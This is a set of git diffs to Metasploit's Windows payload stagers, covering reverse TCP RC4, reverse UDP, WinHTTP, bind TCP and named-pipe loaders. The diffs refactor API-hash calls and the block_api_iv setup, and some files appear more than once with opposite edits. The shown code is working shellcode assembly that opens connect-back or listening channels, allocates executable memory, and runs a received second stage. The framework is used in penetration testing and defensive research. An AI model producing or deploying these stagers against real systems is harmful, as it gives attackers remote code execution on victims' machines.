       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -70,7 +71,7 @@ module Payload::Windows::ReverseTcpRc4
         push 4                  ; length = sizeof( DWORD );
         push esi                ; the 4 byte buffer on the stack to hold the second stage length
         push edi                ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp                ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -93,7 +94,7 @@ module Payload::Windows::ReverseTcpRc4
       ; push esi               ; push the newly received second stage length.
           push ecx             ; push the alloc length
         push 0                 ; NULL as we dont care where the allocation is.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
       ; Receive the second stage and execute it...
       ; xchg ebx, eax          ; ebx = our new memory address for the new stage + S-box
@@ -106,7 +107,7 @@ module Payload::Windows::ReverseTcpRc4
         push esi               ; length
         push ebx               ; the current address into our second stage's RWX buffer
         push edi               ; the saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        push #{block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, buffer, length, 0 );
     ^
 
@@ -122,13 +123,13 @@ module Payload::Windows::ReverseTcpRc4
         push 0x4000             ; dwFreeType (MEM_DECOMMIT)
         push 0                  ; dwSize
         push eax                ; lpAddress
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        push #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call ebp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
 
       cleanup_socket:
         ; clear up the socket
         push edi                ; socket handle
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        push #{block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp                ; closesocket(socket)
 
         ; restore the stack back to the connection retry count

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -41,7 +41,6 @@ module Payload::Windows::ReverseTcpRc4
   # Generate and compile the stager
   #
   def generate_reverse_tcp_rc4(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -41,7 +41,6 @@ module Payload::Windows::ReverseUdp
   # Generate and compile the stager
   #
   def generate_reverse_udp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -41,6 +41,7 @@ module Payload::Windows::ReverseUdp
   # Generate and compile the stager
   #
   def generate_reverse_udp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -75,14 +76,14 @@ module Payload::Windows::ReverseUdp
         push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp                ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
         sub esp, eax            ; alloc some space for the WSAData structure
         push esp                ; push a pointer to this struct
         push eax                ; push the wVersionRequested parameter
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp                ; WSAStartup( 0x0190, &WSAData );
 
       set_address:
@@ -101,7 +102,7 @@ module Payload::Windows::ReverseUdp
         inc eax                 ;
         push eax                ; push SOCK_DGRAM (UDP socket)
         push eax                ; push AF_INET
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call ebp                ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 );
         xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
 
@@ -109,7 +110,7 @@ module Payload::Windows::ReverseUdp
         push 16                 ; length of the sockaddr struct
         push esi                ; pointer to the sockaddr struct
         push edi                ; the socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        push #{block_api_hash('ws2_32.dll', 'connect')}
         call ebp                ; connect( s, &sockaddr, 16 );
 
         test eax,eax            ; non-zero means a failure
@@ -129,7 +130,7 @@ module Payload::Windows::ReverseUdp
     else
       asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
       ^
     end
@@ -160,7 +161,7 @@ module Payload::Windows::ReverseUdp
         db #{newline}          ; newline
       get_nl_address:
         push edi               ; saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        push #{block_api_hash('ws2_32.dll', 'send')}
         call ebp               ; call send
     ^
     asm

--- a/lib/msf/core/payload/windows/reverse_win_http.rb
+++ b/lib/msf/core/payload/windows/reverse_win_http.rb
@@ -62,6 +62,7 @@ module Payload::Windows::ReverseWinHttp
   # Generate and compile the stager
   #
   def generate_reverse_winhttp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.
@@ -205,7 +206,7 @@ module Payload::Windows::ReverseWinHttp
         push 0x00707474        ; Push the string 'winhttp',0
         push 0x686E6977        ; ...
         push esp               ; Push a pointer to the "winhttp" string
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "winhttp" )
       ^
 
@@ -215,7 +216,7 @@ module Payload::Windows::ReverseWinHttp
         push 0x00323374        ; Push the string 'crypt32',0
         push 0x70797263        ; ...
         push esp               ; Push a pointer to the "crypt32" string
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "wincrypt" )
       ^
     end
@@ -236,7 +237,7 @@ module Payload::Windows::ReverseWinHttp
                                ; ProxyName (via call)
         push 3                 ; AccessType (NAMED_PROXY= 3)
         push ebx               ; UserAgent (NULL) [1]
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
         call ebp
       ^
     else
@@ -246,7 +247,7 @@ module Payload::Windows::ReverseWinHttp
         push ebx               ; ProxyName (NULL)
         push ebx               ; AccessType (DEFAULT_PROXY= 0)
         push ebx               ; UserAgent (NULL) [1]
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
         call ebp
       ^
     end
@@ -280,7 +281,7 @@ module Payload::Windows::ReverseWinHttp
 
     asm << %Q^
         push eax               ; Session handle returned by WinHttpOpen
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpConnect')}
         call ebp
 
       WinHttpOpenRequest:
@@ -292,7 +293,7 @@ module Payload::Windows::ReverseWinHttp
         push edi               ; ObjectName (URI)
         push ebx               ; Verb (GET method) (NULL)
         push eax               ; Connect handle returned by WinHttpConnect
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
         call ebp
         xchg esi, eax          ; save HttpRequest handler in esi
       ^
@@ -325,7 +326,7 @@ module Payload::Windows::ReverseWinHttp
         push 1                 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1)
         push 1                 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1)
         push esi               ; hRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
         call ebp
       ^
     elsif opts[:proxy_ie] == true
@@ -337,7 +338,7 @@ module Payload::Windows::ReverseWinHttp
         push edi               ; store the current URL in case it's needed
         mov edi, eax           ; put the buffer pointer in edi
         push edi               ; Push a pointer to the buffer
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
         call ebp
 
         test eax, eax          ; skip the rest of the proxy stuff if the call failed
@@ -374,7 +375,7 @@ module Payload::Windows::ReverseWinHttp
         push edx               ; lpcwszUrl
         lea eax, [esp+64]      ; Find the pointer to the hSession - HACK!
         push [eax]             ; hSession
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
         call ebp
 
         test eax, eax          ; skip the rest of the proxy stuff if the call failed
@@ -403,7 +404,7 @@ module Payload::Windows::ReverseWinHttp
         push edi               ; lpBuffer (pointer to the proxy)
         push 38                ; dwOption (WINHTTP_OPTION_PROXY)
         push esi               ; hRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
         call ebp
 
       ie_proxy_setup_finish:
@@ -420,7 +421,7 @@ module Payload::Windows::ReverseWinHttp
         push eax               ; &buffer
         push 31                ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
         push esi               ; hHttpRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
         call ebp
       ^
     end
@@ -456,7 +457,7 @@ module Payload::Windows::ReverseWinHttp
 
     asm << %Q^
         push esi               ; HttpRequest handle returned by WinHttpOpenRequest [1]
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
         call ebp
         test eax,eax
         jnz check_response     ; if TRUE call WinHttpReceiveResponse API
@@ -476,7 +477,7 @@ module Payload::Windows::ReverseWinHttp
       else
         asm << %Q^
       failure:
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+        push #{block_api_hash('kernel32.dll', 'ExitProcess')}
         call ebp
         ^
       end
@@ -500,7 +501,7 @@ module Payload::Windows::ReverseWinHttp
         push ebx             ; &buffer
         push 78              ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
         push esi             ; hHttpRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
         call ebp
         test eax, eax        ;
         jz failure           ; Bail out if we couldn't get the certificate context
@@ -517,7 +518,7 @@ module Payload::Windows::ReverseWinHttp
         push edi             ; &buffer (20-byte SHA1 hash)
         push 3               ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
         push [ebx]           ; *pCert
-        push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
+        push #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
         call ebp
         test eax, eax        ;
         jz failure           ; Bail out if we couldn't get the certificate context
@@ -555,7 +556,7 @@ module Payload::Windows::ReverseWinHttp
                                ; first to get a valid handle for WinHttpReadData
         push ebx               ; Reserved (NULL)
         push esi               ; Request handler returned by WinHttpSendRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
         call ebp
         test eax,eax
         jz failure
@@ -570,7 +571,7 @@ module Payload::Windows::ReverseWinHttp
       push 4                 ; bytes to read
       push eax               ; &stage size
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
+      push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
       call ebp               ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
       pop ebx                ; bytesRead (unused, pop for cleaning)
       pop ebx                ; stage size
@@ -583,7 +584,7 @@ module Payload::Windows::ReverseWinHttp
       push 0x1000            ; MEM_COMMIT
       push ebx               ; Stage allocation
       push eax               ; NULL as we dont care where the allocation is
-      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+      push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
     download_prep:
@@ -597,7 +598,7 @@ module Payload::Windows::ReverseWinHttp
       push eax               ; read length
       push ebx               ; buffer
       push esi               ; hRequest
-      push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
+      push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
       call ebp
       test eax,eax           ; download failed? (optional?)
       jz failure
@@ -610,7 +611,7 @@ module Payload::Windows::ReverseWinHttp
                                ; first to get a valid handle for WinHttpReadData
         push ebx               ; Reserved (NULL)
         push esi               ; Request handler returned by WinHttpSendRequest
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
         call ebp
         test eax,eax
         jz failure
@@ -620,7 +621,7 @@ module Payload::Windows::ReverseWinHttp
         push 0x1000            ; MEM_COMMIT
         push 0x00400000        ; Stage allocation (4Mb ought to do us)
         push ebx               ; NULL as we dont care where the allocation is
-        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       download_prep:
@@ -634,7 +635,7 @@ module Payload::Windows::ReverseWinHttp
         push 8192              ; NumberOfBytesToRead
         push ebx               ; Buffer
         push esi               ; Request handler returned by WinHttpReceiveResponse
-        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
+        push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
         call ebp
 
         test eax,eax           ; if download failed? (optional?)

--- a/lib/msf/core/payload/windows/reverse_win_http.rb
+++ b/lib/msf/core/payload/windows/reverse_win_http.rb
@@ -62,7 +62,6 @@ module Payload::Windows::ReverseWinHttp
   # Generate and compile the stager
   #
   def generate_reverse_winhttp(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       call start             ; Call start, this pushes the address of 'api_call' onto the stack.

--- a/lib/msf/core/payload/windows/send_uuid.rb
+++ b/lib/msf/core/payload/windows/send_uuid.rb
@@ -28,7 +28,7 @@ module Payload::Windows::SendUUID
         db #{raw_to_db(uuid_raw)}  ; UUID
       get_uuid_address:
         push edi               ; saved socket
-        push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        push #{block_api_hash('ws2_32.dll', 'send')}
         call ebp               ; call send
     ^
 

--- a/lib/msf/core/payload/windows/x64/addr_loader.rb
+++ b/lib/msf/core/payload/windows/x64/addr_loader.rb
@@ -48,7 +48,7 @@ module Payload::Windows::AddrLoader_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx, rcx            ; NULL as we dont care where the allocation is.
-        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         mov rbx, rax            ; rbx = our new memory address for the new stage

--- a/lib/msf/core/payload/windows/x64/addr_loader.rb
+++ b/lib/msf/core/payload/windows/x64/addr_loader.rb
@@ -17,6 +17,7 @@ module Payload::Windows::AddrLoader_x64
   # Generate and compile the loader
   #
   def generate_loader
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
         cld                    ; Clear the direction flag.
         and rsp, ~0xF          ;  Ensure RSP is 16 byte aligned
@@ -47,7 +48,7 @@ module Payload::Windows::AddrLoader_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx, rcx            ; NULL as we dont care where the allocation is.
-        mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         mov rbx, rax            ; rbx = our new memory address for the new stage

--- a/lib/msf/core/payload/windows/x64/addr_loader.rb
+++ b/lib/msf/core/payload/windows/x64/addr_loader.rb
@@ -17,7 +17,6 @@ module Payload::Windows::AddrLoader_x64
   # Generate and compile the loader
   #
   def generate_loader
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
         cld                    ; Clear the direction flag.
         and rsp, ~0xF          ;  Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
@@ -59,6 +59,7 @@ module Payload::Windows::BindNamedPipe_x64
   # Generate and compile the stager
   #
   def generate_bind_named_pipe(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ; Ensure RSP is 16 byte aligned
@@ -121,7 +122,7 @@ module Payload::Windows::BindNamedPipe_x64
         pop r8                     ; nNumberOfBytesToWrite
         sub rsp, 16                ; allocate + alignment
         mov r9, rsp                ; lpNumberOfBytesWritten
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'WriteFile')}
         call rbp                   ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
         add rsp, 16
     ^
@@ -159,7 +160,7 @@ module Payload::Windows::BindNamedPipe_x64
         push 0                  ; nDefaultTimeOut
         push #{chunk_size}      ; nInBufferSize
         push #{chunk_size}      ; nOutBufferSize
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
         call rbp                ; CreateNamedPipeA
         mov rdi, rax            ; save hPipe (using sockrdi convention)
 
@@ -175,11 +176,11 @@ module Payload::Windows::BindNamedPipe_x64
       connect_pipe:
         mov rcx, rdi            ; hPipe
         xor rdx, rdx            ; lpOverlapped
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
         call rbp                ; ConnectNamedPipe
 
       ; check for failure
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'GetLastError')}
         call rbp                ; GetLastError
         cmp rax, 0x217          ; looking for ERROR_PIPE_CONNECTED
         jz get_stage_size       ; success
@@ -188,7 +189,7 @@ module Payload::Windows::BindNamedPipe_x64
 
       ; wait before trying again
         mov rcx, #{retry_wait}
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
         call rbp                ; Sleep
         jmp connect_pipe
       ^
@@ -206,7 +207,7 @@ module Payload::Windows::BindNamedPipe_x64
         mov rdx, rsp            ; lpMode (PIPE_WAIT)
         xor r8, r8              ; lpMaxCollectionCount
         xor r9, r9              ; lpCollectDataTimeout
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
         call rbp
       ^
     end
@@ -221,7 +222,7 @@ module Payload::Windows::BindNamedPipe_x64
         mov r9, rsp             ; lpNumberOfBytesRead
         push 0                  ; alignment
         push 0                  ; lpOverlapped
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
         call rbp                ; ReadFile
         add rsp, 0x30           ; adjust stack
         pop rsi                 ; lpNumberOfBytesRead
@@ -246,7 +247,7 @@ module Payload::Windows::BindNamedPipe_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx, rcx            ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
       ; Receive the second stage and execute it...
       ^
@@ -275,7 +276,7 @@ module Payload::Windows::BindNamedPipe_x64
         mov rdx, rbx            ; lpBuffer
         push 0                  ; lpOverlapped
         mov rcx, rdi            ; hPipe
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
         call rbp                ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
         add rsp, 0x28           ; slight stack adjustment
         pop rdx                 ; lpNumberOfBytesRead
@@ -294,14 +295,14 @@ module Payload::Windows::BindNamedPipe_x64
         pop r8                  ; dwFreeType
         push 0                  ; 0 to decommit whole block
         pop rdx                 ; dwSize
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
         call rbp                ; VirtualFree(payload, 0, MEM_RELEASE)
 
       cleanup_file:
       ; clean up the pipe handle
         push rdi                ; file handle
         pop rcx                 ; hFile
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')}
         call rbp                ; CloseHandle(hPipe)
 
         jmp failure
@@ -333,7 +334,7 @@ module Payload::Windows::BindNamedPipe_x64
         db "kernel32", 0x00
       get_kernel32_name:
         pop rcx                 ;
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
         call rbp                ; GetModuleHandleA("kernel32")
 
         call get_exit_name
@@ -341,7 +342,7 @@ module Payload::Windows::BindNamedPipe_x64
       get_exit_name:
         mov rcx, rax            ; hModule
         pop rdx                 ; lpProcName
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'GetProcAddress')}
         call rbp                ; GetProcAddress(hModule, "ExitThread")
         xor rcx, rcx            ; dwExitCode
         call rax                ; ExitProcess(0)

--- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
@@ -59,7 +59,6 @@ module Payload::Windows::BindNamedPipe_x64
   # Generate and compile the stager
   #
   def generate_bind_named_pipe(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ; Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
@@ -46,6 +46,7 @@ module Payload::Windows::BindTcpRc4_x64
   # Generate and compile the stager
   #
   def generate_bind_tcp_rc4(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
@@ -71,7 +72,7 @@ module Payload::Windows::BindTcpRc4_x64
         push 4                  ;
         pop r8                  ; length = sizeof( DWORD );
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, &dwLength, 4, 0 );
         add rsp, 32             ; we restore RSP from the api_call so we can pop off RSI next
 
@@ -86,7 +87,7 @@ module Payload::Windows::BindTcpRc4_x64
         pop r8                  ; MEM_COMMIT
         mov rdx, rsi            ; the newly received second stage length.
         xor rcx,rcx             ; NULL as we dont care where the allocation is.
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         ; mov rbx, rax            ; rbx = our new memory address for the new stage
@@ -102,7 +103,7 @@ module Payload::Windows::BindTcpRc4_x64
         mov r8, rsi             ; length
         mov rdx, rbx            ; the current address into our second stages RWX buffer
         mov rcx, rdi            ; the saved socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
         call rbp                ; recv( s, buffer, length, 0 );
         add rsp, 32             ; restore stack after api_call
 

--- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
@@ -46,7 +46,6 @@ module Payload::Windows::BindTcpRc4_x64
   # Generate and compile the stager
   #
   def generate_bind_tcp_rc4(opts={})
-    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                     ; Clear the direction flag.
       and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned

--- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
@@ -54,6 +54,7 @@ module Payload::Windows::BindTcp_x64
   # Generate and compile the stager
   #
   def generate_bind_tcp(opts={})
+    block_api_iv # ensure the block API IV is generated before we generate the shellcode so that the hashes are correct
     combined_asm = %Q^
       cld                    ; Clear the direction flag.
       and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
@@ -143,14 +144,14 @@ module Payload::Windows::BindTcp_x64
 
         ; perform the call to LoadLibraryA...
         mov rcx, r14           ; set the param for the library to load
-        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call rbp               ; LoadLibraryA( "ws2_32" )
 
         ; perform the call to WSAStartup...
         mov rdx, r13           ; second param is a pointer to this struct
         push 0x0101            ;
         pop rcx                ; set the param for the version requested
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
         call rbp               ; WSAStartup( 0x0101, &WSAData );
 
         ; perform the call to WSASocketA...
@@ -162,7 +163,7 @@ module Payload::Windows::BindTcp_x64
         xor r8, r8             ; we do not specify a protocol
         inc rax                ;
         mov rdx, rax           ; push SOCK_STREAM
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
         call rbp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
         mov rdi, rax           ; save the socket for later
 
@@ -172,26 +173,26 @@ module Payload::Windows::BindTcp_x64
                                ; first 8 bytes as the rest aren't used)
         mov rdx, r12           ; set the pointer to sockaddr_in struct
         mov rcx, rdi           ; socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'bind')}
         call rbp               ; bind( s, &sockaddr_in, #{sockaddr_size} );
 
         ; perform the call to listen...
         xor rdx, rdx           ; backlog
         mov rcx, rdi           ; socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'listen')}
         call rbp               ; listen( s, 0 );
 
         ; perform the call to accept...
         xor r8, r8             ; we set length for the sockaddr struct to zero
         xor rdx, rdx           ; we dont set the optional sockaddr param
         mov rcx, rdi           ; listening socket
-        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
+        mov r10d, #{block_api_hash('ws2_32.dll', 'accept')}
         call rbp               ; accept( s, 0, 0 );
 
         ; perform the call to closesocket...
         mov rcx, rdi           ; the listening socket to close
         mov rdi, rax           ; swap the new connected socket over the listening socket
